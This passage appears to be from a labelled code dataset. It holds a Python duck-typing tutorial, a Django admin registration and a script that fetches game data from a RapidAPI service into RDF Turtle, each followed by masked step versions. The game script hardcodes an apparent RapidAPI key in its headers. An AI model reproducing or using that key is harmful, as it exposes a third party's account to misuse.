syntax. This is awfully convenient. # isinstance(object, dict) returns True if object is a dictionary - or an instance of a subclass of dict. # Instead of: # # if isinstance(object, dict): # value = object[member] # # it is considered more pythonic to do : # # try: # value = object[member] # except TypeError: # # do something else # # Our example above could become : # # if hasattr(object, 'keys'): # value = object[member] #
normal
{ "blob_id": "776470546585257bf06073e2d894e8a04cf2376d", "index": 727, "step-1": "\"\"\"\nDuck typing\nRef: http://www.voidspace.org.uk/python/articles/duck_typing.shtml\n\"\"\"\n\n##########\n# mathmatic operator (syntactic sugar)\nprint 3 + 3\n# same as >>>\nprint int.__add__(3, 3)\n# <<<\n\n# overload '+' operator\nclass Klass1(object):\n def __init__(self, a, b):\n self.a = a\n self.b = b\n def __add__(self, other):\n return self.a - other.b\n\nclass Klass2(object):\n def __init__(self, a, b):\n self.a = a\n self.b = b\n def __add__(self, other):\n return self.b - other.a\n\nobj1 = Klass1(1, 2)\nobj2 = Klass2(10, 20)\nprint obj1 + obj2\n# same as >>>\nprint obj1.__add__(obj2)\n# <<<\n\n\n##########\n# data access for sequence type objects(list, tuple) and mapping type object(dict)\n# (syntactic sugar)\na = [0,1,2]\nprint a[0]\n# same as >>>\nprint list.__getitem__(a, 0)\n# <<<\n\nb = {'a':0, 'b':1}\nprint b['a']\n# same as >>>\nprint dict.__getitem__(b, 'a')\n# <<<\n\n##########\n# function call\n# callable checks where a var has __call__ attr.\ndef f(arg):\n print arg\n\nf(123)\n# >>> 123\n# same as >>>\nf.__call__(123)\n# >>> 123\n# <<<\n\\\n\n\n# 'Duck typing' happens because when we do var['member'] Python doesn't care what type object var is.\n# All it cares is whether the call to its __getitem__ method returns anything sensible. If not - an error will be raised. Something like TypeError: Unsubscriptable object..\n# This means you can create your own classes that have their own internal data structures - but are accessed using normal Python syntax. This is awfully convenient.\n\n# isinstance(object, dict) returns True if object is a dictionary - or an instance of a subclass of dict.\n# Instead of:\n#\n# if isinstance(object, dict):\n# value = object[member]\n#\n# it is considered more pythonic to do :\n#\n# try:\n# value = object[member]\n# except TypeError:\n# # do something else\n#\n# Our example above could become :\n#\n# if hasattr(object, 'keys'):\n# value = object[member]\n#\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
from django.contrib import admin from pharma_models.personas.models import Persona admin.site.register(Persona)
normal
{ "blob_id": "59d04ebd9a45c6a179a2da1f88f728ba2af91c05", "index": 590, "step-1": "<mask token>\n", "step-2": "<mask token>\nadmin.site.register(Persona)\n", "step-3": "from django.contrib import admin\nfrom pharma_models.personas.models import Persona\nadmin.site.register(Persona)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
import requests import json from termcolor import cprint from pathlib import Path import os def console_check(csl, f): if csl == 'playstation-4': f.write('\tdbo:computingPlatform dbpedia:PlayStation_4.') if csl == 'playstation-3': f.write('\tdbo:computingPlatform dbpedia:PlayStation_3.') if csl == 'playstation-2': f.write('\tdbo:computingPlatform dbpedia:PlayStation_2.') if csl == 'playstation': f.write('\tdbo:computingPlatform dbpedia:PlayStation.') if csl == 'xbox-one': f.write('\tdbo:computingPlatform dbpedia:Xbox_One.') if csl == 'xbox-360': f.write('\tdbo:computingPlatform dbpedia:Xbox_360.') if csl == 'switch': f.write('\tdbo:computingPlatform dbpedia:Nintendo_Switch.') if csl == 'pc': f.write('\tdbo:computingPlatform dbpedia:Computer.') f.write('\n\n') def initial_warnings(): cprint("Esse programa funciona usando uma API chamada Chicken Coop API.", "red", attrs=['bold']) cprint("Essa API pega informações sobre jogos de determinados consoles.", "red", attrs=['bold']) cprint("Para que ela rode corretamente, siga as seguintes instruções:", "cyan", attrs=['bold']) cprint("Consoles:", 'yellow', attrs=['bold']) cprint(" Playstation 4 -> playstation-4", "green", attrs=['bold']) cprint(" Xbox One -> xbox-one", "green", attrs=['bold']) cprint(" Computador -> pc", "green", attrs=['bold']) cprint(" Nintendo Switch -> switch", "green", attrs=['bold']) cprint("Exemplos de jogos: ", 'yellow', attrs=['bold']) cprint(" Uncharted: The Lost Legacy", "green", attrs=['bold']) cprint(" God of War", "green", attrs=['bold']) cprint(" Ori and The Blind Forest", "green", attrs=['bold']) cprint("Aviso: Os jogos devem ser escritos com o nome exato e os consoles da maneira demonstrada," " caso contrário, não funcionará!", 'magenta', attrs=['bold']) print("\n") def get_and_write(mc, csl): print(f"Title: {mc['result']['title']}") print(f"Release Date: {mc['result']['releaseDate']}") # print(f"Description: {mc['result']['description']}") print(f"Score: {mc['result']['score']}") # print(f"Rating: {mc['result']['rating']}") print(f"Developer: {mc['result']['developer']}\n") mc_title = mc['result']['title'] # mc_description = mc['result']['description'] mc_score = mc['result']['score'] mc_developer = mc['result']['developer'] rsp = write_file(mc_title, mc_score, mc_developer, mc, csl) if rsp: write_file(mc_title, mc_score, mc_developer, mc, csl) def write_file(title, score, developer, mc, csl): source = "<https://www.metacritic.com/game/" aux_title = '' source = source + csl + '/' path = Path('gamedeflib_rdf.ttl') if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0: file = open('gamedeflib_rdf.ttl', 'r') count = 1 for element in file: jogo = f'_:game{count}\n' if element == jogo: count = count + 1 file.close() file = open('gamedeflib_rdf.ttl', 'a+') file.write(f'\n_:game{count}\n') file.write(f'\trdfs:label "{title}";\n') file.write(f'\tdbp:score {score};\n') genre_number(mc, file) publisher_number(mc, file) file.write(f'\tdbo:developer "{developer}";\n') aux_title = title.lower() aux_title = aux_title.replace(":", "") aux_title = aux_title.replace(" ", "-") source = source + aux_title + ">" file.write(f'\tdc:source {source};\n') console_check(csl, file) file.close() else: file = open('gamedeflib_rdf.ttl', 'w+') file.write("@prefix dc: <http://purl.org/dc/elements/1.1/> .\n") file.write("@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\n") file.write("@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .\n") file.write("@prefix foaf: <http://xmlns.com/foaf/0.1/> .\n") file.write("@prefix dbo: <http://dbpedia.org/ontology/> .\n") file.write("@prefix dbpedia: <http://dbpedia.org/page/> .\n") file.write("@prefix dbp: <http://dbpedia.org/property/> .\n") file.write('dbpedia:PlayStation_4\n' '\tfoaf:name "PlayStation 4";\n' '\tdbo:type dbpedia:Home_video_game_console;\n' '\trdfs:label "PlayStation 4".\n\n') file.write('dbpedia:PlayStation_3\n' '\tdbo:type dbpedia:Home_video_game_console;\n' '\trdfs:label "PlayStation 3".\n\n') file.write('dbpedia:PlayStation_2\n' '\tdbo:type dbpedia:Home_video_game_console;\n' '\trdfs:label "PlayStation 2".\n\n') file.write('dbpedia:PlayStation\n' '\tdbp:type dbpedia:Video_game_console;\n' '\trdfs:label "PlayStation".\n\n') file.write('dbpedia:XBox_One\n' '\tfoaf:name "XBox One";\n' '\tdbo:type dbpedia:Home_video_game_console;\n' '\trdfs:label "XBox One" .\n\n') file.write('dbpedia:XBox_360\n' '\tdbo:type dbpedia:Home_video_game_console;\n' '\trdfs:label "XBox 360" .\n\n') file.write('dbpedia:Nintendo_Switch\n' '\tfoaf:name "New Nintendank New Wii U 2.0+";\n' '\tdbo:type dbpedia:Video_game_hardware;\n' '\trdfs:label "Nintendo Switch" .\n\n') file.write('dbpedia:Computer\n' '\tdbp:title "Computer";\n' '\trdf:type dbo:Device;\n' '\trdfs:label "Computer" .\n\n') return 1 def genre_number(mc, f): tam = len(mc['result']['genre']) for x in range(0, tam): print(f"Genre number {x+1}: {mc['result']['genre'][x]}") aux = mc['result']['genre'][x] f.write(f'\tdbo:genre "{aux}";\n') def publisher_number(mc, f): tam = len(mc['result']['publisher']) for x in range(0, tam): print(f"Publisher number {x + 1}: {mc['result']['publisher'][x]}") aux = mc['result']['publisher'][x] f.write(f'\tdbo:publisher "{aux}";\n') def main(): print('Digite o console do jogo desejado: ', end='') console = str(input()) print('Digite o título do jogo desejado: ', end='') title = str(input()) try: url = "https://chicken-coop.p.rapidapi.com/games/"+title querystring = {"platform": console} headers = { 'x-rapidapi-host': "chicken-coop.p.rapidapi.com", 'x-rapidapi-key': "c3df04dcc0msh2d6e3cc8ccd93dep1c9851jsn230c81227b26" } response = requests.request("GET", url, headers=headers, params=querystring) metacritic = json.loads(response.text) if metacritic['result'] == 'No result': print("\nAlguma informação digitada está incorreta. Tente novamente.") else: get_and_write(metacritic, console) except Exception as err: print("Algum erro desconhecido ocorreu durante a execucação.\nTente novamente.") cprint(err, 'red') initial_warnings() main() while True: print('Gostaria de adicionar outro jogo na base RDF: (1 - Sim/0 - Não): ', end='') try: ans = int(input()) if ans == 1: main() elif ans == 0: print('Encerrando o script') break else: print('Valor digitado deve ser 0 ou 1.') except ValueError as e: print('Valor foi inserido incorretamente. Tente denovo.') cprint(e, 'red')
normal
{ "blob_id": "b290763362af96f5af03fa31f4936339cef66a1d", "index": 2062, "step-1": "<mask token>\n\n\ndef console_check(csl, f):\n if csl == 'playstation-4':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_4.')\n if csl == 'playstation-3':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_3.')\n if csl == 'playstation-2':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_2.')\n if csl == 'playstation':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation.')\n if csl == 'xbox-one':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_One.')\n if csl == 'xbox-360':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_360.')\n if csl == 'switch':\n f.write('\\tdbo:computingPlatform dbpedia:Nintendo_Switch.')\n if csl == 'pc':\n f.write('\\tdbo:computingPlatform dbpedia:Computer.')\n f.write('\\n\\n')\n\n\ndef initial_warnings():\n cprint('Esse programa funciona usando uma API chamada Chicken Coop API.',\n 'red', attrs=['bold'])\n cprint('Essa API pega informações sobre jogos de determinados consoles.',\n 'red', attrs=['bold'])\n cprint('Para que ela rode corretamente, siga as seguintes instruções:',\n 'cyan', attrs=['bold'])\n cprint('Consoles:', 'yellow', attrs=['bold'])\n cprint(' Playstation 4 -> playstation-4', 'green', attrs=['bold'])\n cprint(' Xbox One -> xbox-one', 'green', attrs=['bold'])\n cprint(' Computador -> pc', 'green', attrs=['bold'])\n cprint(' Nintendo Switch -> switch', 'green', attrs=['bold'])\n cprint('Exemplos de jogos: ', 'yellow', attrs=['bold'])\n cprint(' Uncharted: The Lost Legacy', 'green', attrs=['bold'])\n cprint(' God of War', 'green', attrs=['bold'])\n cprint(' Ori and The Blind Forest', 'green', attrs=['bold'])\n cprint(\n 'Aviso: Os jogos devem ser escritos com o nome exato e os consoles da maneira demonstrada, caso contrário, não funcionará!'\n , 'magenta', attrs=['bold'])\n print('\\n')\n\n\ndef get_and_write(mc, csl):\n print(f\"Title: {mc['result']['title']}\")\n print(f\"Release Date: {mc['result']['releaseDate']}\")\n print(f\"Score: {mc['result']['score']}\")\n print(f\"Developer: {mc['result']['developer']}\\n\")\n mc_title = mc['result']['title']\n mc_score = mc['result']['score']\n mc_developer = mc['result']['developer']\n rsp = write_file(mc_title, mc_score, mc_developer, mc, csl)\n if rsp:\n write_file(mc_title, mc_score, mc_developer, mc, csl)\n\n\ndef write_file(title, score, developer, mc, csl):\n source = '<https://www.metacritic.com/game/'\n aux_title = ''\n source = source + csl + '/'\n path = Path('gamedeflib_rdf.ttl')\n if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0:\n file = open('gamedeflib_rdf.ttl', 'r')\n count = 1\n for element in file:\n jogo = f'_:game{count}\\n'\n if element == jogo:\n count = count + 1\n file.close()\n file = open('gamedeflib_rdf.ttl', 'a+')\n file.write(f'\\n_:game{count}\\n')\n file.write(f'\\trdfs:label \"{title}\";\\n')\n file.write(f'\\tdbp:score {score};\\n')\n genre_number(mc, file)\n publisher_number(mc, file)\n file.write(f'\\tdbo:developer \"{developer}\";\\n')\n aux_title = title.lower()\n aux_title = aux_title.replace(':', '')\n aux_title = aux_title.replace(' ', '-')\n source = source + aux_title + '>'\n file.write(f'\\tdc:source {source};\\n')\n console_check(csl, file)\n file.close()\n else:\n file = open('gamedeflib_rdf.ttl', 'w+')\n file.write('@prefix dc: \\t<http://purl.org/dc/elements/1.1/> .\\n')\n file.write(\n '@prefix rdf:\\t<http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\\n')\n file.write('@prefix rdfs:\\t<http://www.w3.org/2000/01/rdf-schema#> .\\n'\n )\n file.write('@prefix foaf:\\t<http://xmlns.com/foaf/0.1/> .\\n')\n file.write('@prefix dbo: <http://dbpedia.org/ontology/> .\\n')\n file.write('@prefix dbpedia: <http://dbpedia.org/page/> .\\n')\n file.write('@prefix dbp: <http://dbpedia.org/property/> .\\n')\n file.write(\n \"\"\"dbpedia:PlayStation_4\n\tfoaf:name \"PlayStation 4\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 4\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_3\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 3\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_2\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 2\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation\n\tdbp:type dbpedia:Video_game_console;\n\trdfs:label \"PlayStation\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_One\n\tfoaf:name \"XBox One\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox One\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_360\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox 360\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Nintendo_Switch\n\tfoaf:name \"New Nintendank New Wii U 2.0+\";\n\tdbo:type dbpedia:Video_game_hardware;\n\trdfs:label \"Nintendo Switch\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Computer\n\tdbp:title \"Computer\";\n\trdf:type dbo:Device;\n\trdfs:label \"Computer\" .\n\n\"\"\"\n )\n return 1\n\n\ndef genre_number(mc, f):\n tam = len(mc['result']['genre'])\n for x in range(0, tam):\n print(f\"Genre number {x + 1}: {mc['result']['genre'][x]}\")\n aux = mc['result']['genre'][x]\n f.write(f'\\tdbo:genre \"{aux}\";\\n')\n\n\ndef publisher_number(mc, f):\n tam = len(mc['result']['publisher'])\n for x in range(0, tam):\n print(f\"Publisher number {x + 1}: {mc['result']['publisher'][x]}\")\n aux = mc['result']['publisher'][x]\n f.write(f'\\tdbo:publisher \"{aux}\";\\n')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef console_check(csl, f):\n if csl == 'playstation-4':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_4.')\n if csl == 'playstation-3':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_3.')\n if csl == 'playstation-2':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_2.')\n if csl == 'playstation':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation.')\n if csl == 'xbox-one':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_One.')\n if csl == 'xbox-360':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_360.')\n if csl == 'switch':\n f.write('\\tdbo:computingPlatform dbpedia:Nintendo_Switch.')\n if csl == 'pc':\n f.write('\\tdbo:computingPlatform dbpedia:Computer.')\n f.write('\\n\\n')\n\n\ndef initial_warnings():\n cprint('Esse programa funciona usando uma API chamada Chicken Coop API.',\n 'red', attrs=['bold'])\n cprint('Essa API pega informações sobre jogos de determinados consoles.',\n 'red', attrs=['bold'])\n cprint('Para que ela rode corretamente, siga as seguintes instruções:',\n 'cyan', attrs=['bold'])\n cprint('Consoles:', 'yellow', attrs=['bold'])\n cprint(' Playstation 4 -> playstation-4', 'green', attrs=['bold'])\n cprint(' Xbox One -> xbox-one', 'green', attrs=['bold'])\n cprint(' Computador -> pc', 'green', attrs=['bold'])\n cprint(' Nintendo Switch -> switch', 'green', attrs=['bold'])\n cprint('Exemplos de jogos: ', 'yellow', attrs=['bold'])\n cprint(' Uncharted: The Lost Legacy', 'green', attrs=['bold'])\n cprint(' God of War', 'green', attrs=['bold'])\n cprint(' Ori and The Blind Forest', 'green', attrs=['bold'])\n cprint(\n 'Aviso: Os jogos devem ser escritos com o nome exato e os consoles da maneira demonstrada, caso contrário, não funcionará!'\n , 'magenta', attrs=['bold'])\n print('\\n')\n\n\ndef get_and_write(mc, csl):\n print(f\"Title: {mc['result']['title']}\")\n print(f\"Release Date: {mc['result']['releaseDate']}\")\n print(f\"Score: {mc['result']['score']}\")\n print(f\"Developer: {mc['result']['developer']}\\n\")\n mc_title = mc['result']['title']\n mc_score = mc['result']['score']\n mc_developer = mc['result']['developer']\n rsp = write_file(mc_title, mc_score, mc_developer, mc, csl)\n if rsp:\n write_file(mc_title, mc_score, mc_developer, mc, csl)\n\n\ndef write_file(title, score, developer, mc, csl):\n source = '<https://www.metacritic.com/game/'\n aux_title = ''\n source = source + csl + '/'\n path = Path('gamedeflib_rdf.ttl')\n if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0:\n file = open('gamedeflib_rdf.ttl', 'r')\n count = 1\n for element in file:\n jogo = f'_:game{count}\\n'\n if element == jogo:\n count = count + 1\n file.close()\n file = open('gamedeflib_rdf.ttl', 'a+')\n file.write(f'\\n_:game{count}\\n')\n file.write(f'\\trdfs:label \"{title}\";\\n')\n file.write(f'\\tdbp:score {score};\\n')\n genre_number(mc, file)\n publisher_number(mc, file)\n file.write(f'\\tdbo:developer \"{developer}\";\\n')\n aux_title = title.lower()\n aux_title = aux_title.replace(':', '')\n aux_title = aux_title.replace(' ', '-')\n source = source + aux_title + '>'\n file.write(f'\\tdc:source {source};\\n')\n console_check(csl, file)\n file.close()\n else:\n file = open('gamedeflib_rdf.ttl', 'w+')\n file.write('@prefix dc: \\t<http://purl.org/dc/elements/1.1/> .\\n')\n file.write(\n '@prefix rdf:\\t<http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\\n')\n file.write('@prefix rdfs:\\t<http://www.w3.org/2000/01/rdf-schema#> .\\n'\n )\n file.write('@prefix foaf:\\t<http://xmlns.com/foaf/0.1/> .\\n')\n file.write('@prefix dbo: <http://dbpedia.org/ontology/> .\\n')\n file.write('@prefix dbpedia: <http://dbpedia.org/page/> .\\n')\n file.write('@prefix dbp: <http://dbpedia.org/property/> .\\n')\n file.write(\n \"\"\"dbpedia:PlayStation_4\n\tfoaf:name \"PlayStation 4\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 4\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_3\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 3\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_2\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 2\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation\n\tdbp:type dbpedia:Video_game_console;\n\trdfs:label \"PlayStation\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_One\n\tfoaf:name \"XBox One\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox One\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_360\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox 360\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Nintendo_Switch\n\tfoaf:name \"New Nintendank New Wii U 2.0+\";\n\tdbo:type dbpedia:Video_game_hardware;\n\trdfs:label \"Nintendo Switch\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Computer\n\tdbp:title \"Computer\";\n\trdf:type dbo:Device;\n\trdfs:label \"Computer\" .\n\n\"\"\"\n )\n return 1\n\n\ndef genre_number(mc, f):\n tam = len(mc['result']['genre'])\n for x in range(0, tam):\n print(f\"Genre number {x + 1}: {mc['result']['genre'][x]}\")\n aux = mc['result']['genre'][x]\n f.write(f'\\tdbo:genre \"{aux}\";\\n')\n\n\ndef publisher_number(mc, f):\n tam = len(mc['result']['publisher'])\n for x in range(0, tam):\n print(f\"Publisher number {x + 1}: {mc['result']['publisher'][x]}\")\n aux = mc['result']['publisher'][x]\n f.write(f'\\tdbo:publisher \"{aux}\";\\n')\n\n\ndef main():\n print('Digite o console do jogo desejado: ', end='')\n console = str(input())\n print('Digite o título do jogo desejado: ', end='')\n title = str(input())\n try:\n url = 'https://chicken-coop.p.rapidapi.com/games/' + title\n querystring = {'platform': console}\n headers = {'x-rapidapi-host': 'chicken-coop.p.rapidapi.com',\n 'x-rapidapi-key':\n 'c3df04dcc0msh2d6e3cc8ccd93dep1c9851jsn230c81227b26'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n metacritic = json.loads(response.text)\n if metacritic['result'] == 'No result':\n print(\n '\\nAlguma informação digitada está incorreta. Tente novamente.'\n )\n else:\n get_and_write(metacritic, console)\n except Exception as err:\n print(\n 'Algum erro desconhecido ocorreu durante a execucação.\\nTente novamente.'\n )\n cprint(err, 'red')\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef console_check(csl, f):\n if csl == 'playstation-4':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_4.')\n if csl == 'playstation-3':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_3.')\n if csl == 'playstation-2':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_2.')\n if csl == 'playstation':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation.')\n if csl == 'xbox-one':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_One.')\n if csl == 'xbox-360':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_360.')\n if csl == 'switch':\n f.write('\\tdbo:computingPlatform dbpedia:Nintendo_Switch.')\n if csl == 'pc':\n f.write('\\tdbo:computingPlatform dbpedia:Computer.')\n f.write('\\n\\n')\n\n\ndef initial_warnings():\n cprint('Esse programa funciona usando uma API chamada Chicken Coop API.',\n 'red', attrs=['bold'])\n cprint('Essa API pega informações sobre jogos de determinados consoles.',\n 'red', attrs=['bold'])\n cprint('Para que ela rode corretamente, siga as seguintes instruções:',\n 'cyan', attrs=['bold'])\n cprint('Consoles:', 'yellow', attrs=['bold'])\n cprint(' Playstation 4 -> playstation-4', 'green', attrs=['bold'])\n cprint(' Xbox One -> xbox-one', 'green', attrs=['bold'])\n cprint(' Computador -> pc', 'green', attrs=['bold'])\n cprint(' Nintendo Switch -> switch', 'green', attrs=['bold'])\n cprint('Exemplos de jogos: ', 'yellow', attrs=['bold'])\n cprint(' Uncharted: The Lost Legacy', 'green', attrs=['bold'])\n cprint(' God of War', 'green', attrs=['bold'])\n cprint(' Ori and The Blind Forest', 'green', attrs=['bold'])\n cprint(\n 'Aviso: Os jogos devem ser escritos com o nome exato e os consoles da maneira demonstrada, caso contrário, não funcionará!'\n , 'magenta', attrs=['bold'])\n print('\\n')\n\n\ndef get_and_write(mc, csl):\n print(f\"Title: {mc['result']['title']}\")\n print(f\"Release Date: {mc['result']['releaseDate']}\")\n print(f\"Score: {mc['result']['score']}\")\n print(f\"Developer: {mc['result']['developer']}\\n\")\n mc_title = mc['result']['title']\n mc_score = mc['result']['score']\n mc_developer = mc['result']['developer']\n rsp = write_file(mc_title, mc_score, mc_developer, mc, csl)\n if rsp:\n write_file(mc_title, mc_score, mc_developer, mc, csl)\n\n\ndef write_file(title, score, developer, mc, csl):\n source = '<https://www.metacritic.com/game/'\n aux_title = ''\n source = source + csl + '/'\n path = Path('gamedeflib_rdf.ttl')\n if path.is_file() and os.stat('gamedeflib_rdf.ttl').st_size > 0:\n file = open('gamedeflib_rdf.ttl', 'r')\n count = 1\n for element in file:\n jogo = f'_:game{count}\\n'\n if element == jogo:\n count = count + 1\n file.close()\n file = open('gamedeflib_rdf.ttl', 'a+')\n file.write(f'\\n_:game{count}\\n')\n file.write(f'\\trdfs:label \"{title}\";\\n')\n file.write(f'\\tdbp:score {score};\\n')\n genre_number(mc, file)\n publisher_number(mc, file)\n file.write(f'\\tdbo:developer \"{developer}\";\\n')\n aux_title = title.lower()\n aux_title = aux_title.replace(':', '')\n aux_title = aux_title.replace(' ', '-')\n source = source + aux_title + '>'\n file.write(f'\\tdc:source {source};\\n')\n console_check(csl, file)\n file.close()\n else:\n file = open('gamedeflib_rdf.ttl', 'w+')\n file.write('@prefix dc: \\t<http://purl.org/dc/elements/1.1/> .\\n')\n file.write(\n '@prefix rdf:\\t<http://www.w3.org/1999/02/22-rdf-syntax-ns#> .\\n')\n file.write('@prefix rdfs:\\t<http://www.w3.org/2000/01/rdf-schema#> .\\n'\n )\n file.write('@prefix foaf:\\t<http://xmlns.com/foaf/0.1/> .\\n')\n file.write('@prefix dbo: <http://dbpedia.org/ontology/> .\\n')\n file.write('@prefix dbpedia: <http://dbpedia.org/page/> .\\n')\n file.write('@prefix dbp: <http://dbpedia.org/property/> .\\n')\n file.write(\n \"\"\"dbpedia:PlayStation_4\n\tfoaf:name \"PlayStation 4\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 4\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_3\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 3\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation_2\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"PlayStation 2\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:PlayStation\n\tdbp:type dbpedia:Video_game_console;\n\trdfs:label \"PlayStation\".\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_One\n\tfoaf:name \"XBox One\";\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox One\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:XBox_360\n\tdbo:type dbpedia:Home_video_game_console;\n\trdfs:label \"XBox 360\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Nintendo_Switch\n\tfoaf:name \"New Nintendank New Wii U 2.0+\";\n\tdbo:type dbpedia:Video_game_hardware;\n\trdfs:label \"Nintendo Switch\" .\n\n\"\"\"\n )\n file.write(\n \"\"\"dbpedia:Computer\n\tdbp:title \"Computer\";\n\trdf:type dbo:Device;\n\trdfs:label \"Computer\" .\n\n\"\"\"\n )\n return 1\n\n\ndef genre_number(mc, f):\n tam = len(mc['result']['genre'])\n for x in range(0, tam):\n print(f\"Genre number {x + 1}: {mc['result']['genre'][x]}\")\n aux = mc['result']['genre'][x]\n f.write(f'\\tdbo:genre \"{aux}\";\\n')\n\n\ndef publisher_number(mc, f):\n tam = len(mc['result']['publisher'])\n for x in range(0, tam):\n print(f\"Publisher number {x + 1}: {mc['result']['publisher'][x]}\")\n aux = mc['result']['publisher'][x]\n f.write(f'\\tdbo:publisher \"{aux}\";\\n')\n\n\ndef main():\n print('Digite o console do jogo desejado: ', end='')\n console = str(input())\n print('Digite o título do jogo desejado: ', end='')\n title = str(input())\n try:\n url = 'https://chicken-coop.p.rapidapi.com/games/' + title\n querystring = {'platform': console}\n headers = {'x-rapidapi-host': 'chicken-coop.p.rapidapi.com',\n 'x-rapidapi-key':\n 'c3df04dcc0msh2d6e3cc8ccd93dep1c9851jsn230c81227b26'}\n response = requests.request('GET', url, headers=headers, params=\n querystring)\n metacritic = json.loads(response.text)\n if metacritic['result'] == 'No result':\n print(\n '\\nAlguma informação digitada está incorreta. Tente novamente.'\n )\n else:\n get_and_write(metacritic, console)\n except Exception as err:\n print(\n 'Algum erro desconhecido ocorreu durante a execucação.\\nTente novamente.'\n )\n cprint(err, 'red')\n\n\ninitial_warnings()\nmain()\nwhile True:\n print('Gostaria de adicionar outro jogo na base RDF: (1 - Sim/0 - Não): ',\n end='')\n try:\n ans = int(input())\n if ans == 1:\n main()\n elif ans == 0:\n print('Encerrando o script')\n break\n else:\n print('Valor digitado deve ser 0 ou 1.')\n except ValueError as e:\n print('Valor foi inserido incorretamente. Tente denovo.')\n cprint(e, 'red')\n", "step-4": "import requests\nimport json\nfrom termcolor import cprint\nfrom pathlib import Path\nimport os\n\n\ndef console_check(csl, f):\n if csl == 'playstation-4':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_4.')\n if csl == 'playstation-3':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_3.')\n if csl == 'playstation-2':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation_2.')\n if csl == 'playstation':\n f.write('\\tdbo:computingPlatform dbpedia:PlayStation.')\n if csl == 'xbox-one':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_One.')\n if csl == 'xbox-360':\n f.write('\\tdbo:computingPlatform dbpedia:Xbox_360.')\n if csl == 'switch':\n f.write('\\tdbo:computingPlatform dbpedia:Nintendo_Switch.')\n if csl == 'pc':\n f.write('\\tdbo:computingPlatform dbpedia:Computer.')\n f.write('\\n\\n')\n\n\ndef initial_warnings():\n cprint('Esse programa funciona usando uma API chamada Chicken Coop API.',\n 'red', attrs=['bold'])\n cprint('Essa API pega informações sobre jogos de determinados consoles.',\n 'red', attrs=['bold'])\n cprint('Para que ela rode corretamente, siga as seguintes instruções:',\n 'cyan', attrs=['bold'])\n cprint('Consoles:', 'yellow', attrs=['bold'])\n cprint(' Playstation 4 -> playstation-4', 'green', attrs=['bold'])\n cprint(' Xbox One -> xbox-one', 'green', attrs=['bold'])\n cprint(' Computador -> pc', 